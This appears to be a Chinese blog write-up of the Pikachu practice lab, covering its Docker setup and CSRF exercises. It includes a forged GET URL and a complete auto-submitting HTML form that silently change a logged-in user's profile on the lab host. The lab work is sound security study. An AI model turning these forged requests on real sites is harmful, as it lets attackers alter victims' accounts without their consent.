pikachu靶场学习

Posted Jach1n

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pikachu靶场学习相关的知识,希望对你有一定的参考价值。

pikachu靶场

环境

虚拟机192.168.48.130
docker+centos8

安装

这里把启动指令写成脚本文件了,方便启动
启动完成后,访问http://your-ip:port,点击初始化安装后按照提示操作即可

docker search pikachu
docker pull area39/pikachu
docker images
vi pikachu.sh
    docker run -dt --name pikachu -p 80:80 --rm area39/pikachu
chmod +x pikachu.sh
./pikachu
docker ps
-----------------------------------------------------------------
docker进入镜像
docker ps  查看containerid
docker exec -it containerid /bin/bash
mysql -u root -p  数据库密码为空密码

CSRF

CSRF(get)

根据提示登录

修改个人信息,在提交的时候抓包

修改下请求信息里的内容
GET /vul/csrf/csrfget/csrf_get_edit.php?sex=dog&phonenum=10010&add=666&email=67890%40qq.com&submit=submit HTTP/1.1

修改url中的ip地址
http://192.168.48.130/vul/csrf/csrfget/csrf_get_edit.php?sex=dog&phonenum=10010&add=666&email=67890%40qq.com&submit=submit

用另外一台电脑打开链接的效果更真实些
为了方便可以直接在自己的电脑上打开该地址
可以看到个人信息已被更改

CSRF(post)

换了个用户登录,同样修改信息抓包看下
虽然也有用户信息,但是由于是post请求没法通过url来伪造请求

需要自己写个html文件然后通过post方式提交
在表单中修改下要修改的信息
```html/xml
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.48.130/vul/csrf/csrfpost/csrf_post_edit.php">;
<input id="sex" type="text" name="sex" value="pig" />
<input id="phonenum" type="text" name="phonenum" value="1008611" />
<input id="add" type="text" name="add" value="shanghai" />
<input id="email" type="text" name="email" value="123456@qq.com" />
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>



修改好代码后,新建txt并写入,然后改为html文件
直接将html文件拖入到浏览器中即可
修改成功
![image20210704110756430.png](https://s2.51cto.com/images/20210723/1627019478370763.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

![image20210704110809891.png](https://s2.51cto.com/images/20210723/1627019484600315.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

## CSRF Token

每次请求都会加一个随机的token并进行验证
这块试了试好像没什么办法
![image20210704115802779.png](https://s2.51cto.com/images/20210723/1627019508142195.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

以上是关于pikachu靶场学习的主要内容,如果未能解决你的问题,请参考以下文章

JAVA代码审计之WebGoat靶场SQL注入

掌握渗透测试,从Web漏洞靶场搭建开始

pikachu靶场学习

pikachu靶场学习

pikachu靶场学习

pikachu靶场学习